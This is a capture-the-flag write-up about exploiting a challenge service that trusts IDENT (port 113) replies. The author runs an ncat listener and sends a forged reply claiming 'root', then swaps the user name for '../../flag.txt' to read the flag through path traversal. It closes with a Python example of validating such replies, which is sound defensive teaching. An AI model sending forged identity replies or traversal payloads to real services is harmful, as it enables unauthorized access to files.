Connect to the service

By running `find /` we find out the flag file is in /flag.txt,
but the correct contents are on the victim machine we can access
via `ssh -p 2000 localhost`.

Use `ssh -p 2000 localhost` to connect and get the following error:

Connection to localhost (::1) 2000 port [tcp/*] succeeded!
#########################################################################
#                                                                       #
#                             Unknown User!                             #
#                                                                       #
#########################################################################
TCP Wrappers: Connection refused! Make sure that port 113 can be reached!
User: unknown
Client: ::1
Hostname: localhost
Date: Thu Mar 14 19:50:09 UTC 2024

We open up port 113 using `ncat -6 -l -p 113` (IPv6, based on the description hint).

Next time we connect we get a single line from the victim:
36362,2000

Googling "service port 113", we find that this is the port for the IDENT
service, which, when given a src,dst port pair, returns the user initiating
the connection.

If we connect again and reply with `36362,2000 : USERID : UNIX : root`
we get the following instead:

cat: /tmp/users/root: No such file or directory

TCP Wrappers: Hello root !
User: root
Client: ::1
Hostname: localhost
Date: Thu Mar 14 19:49:50 UTC 2024

So for some reason, the user name is used in a shell command to cat a file...

Using path traversal we can read the flag:

XXXXX,2000 : USERID : UNIX : ../../flag.txt
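How the server side could treat the IDENT reply as untrusted input, as an added example (not the challenge's code, which these notes do not show). The `/tmp/users` directory comes from the error message above; the function names and the allowed user-name pattern are assumptions.

```python
import re
from pathlib import Path

# Directory taken from the error message in the notes; the rest is assumed.
USERS_DIR = Path("/tmp/users")
# Assumed policy: only conventional Unix login names are acceptable.
SAFE_USER = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
# <server-port> , <client-port> : USERID : <opsys> : <user-id>
REPLY = re.compile(
    r"\s*(\d{1,5})\s*,\s*(\d{1,5})\s*:\s*USERID\s*:\s*([^:]*?)\s*:(.*)")


def parse_ident_reply(line, expected_ports):
    """Return the user id claimed in a USERID reply.

    The reply comes from a daemon on the connecting host, so every
    field is attacker-controlled. Raises ValueError if it is malformed
    or answers a different port pair than the one that was queried.
    """
    m = REPLY.fullmatch(line.rstrip("\r\n"))
    if not m:
        raise ValueError("not a USERID reply")
    if (int(m.group(1)), int(m.group(2))) != expected_ports:
        raise ValueError("port pair does not match the query")
    return m.group(4).strip()  # this example ignores surrounding blanks


def user_file(userid, base=USERS_DIR):
    """Map a user id to its file directly under base, or raise ValueError."""
    if not SAFE_USER.fullmatch(userid):
        raise ValueError(f"rejected user id {userid!r}")
    base = base.resolve()
    candidate = (base / userid).resolve()  # follows symlinks as well
    if candidate.parent != base:
        raise ValueError("path escapes the users directory")
    # Read this path with open(); never splice the name into a shell command.
    return candidate


if __name__ == "__main__":
    ports = (36362, 2000)  # port pair from the notes
    for reply in ("36362,2000 : USERID : UNIX : root",
                  "36362,2000 : USERID : UNIX : ../../flag.txt"):
        try:
            print(user_file(parse_ident_reply(reply, ports)))
        except ValueError as exc:
            print("refused:", exc)
```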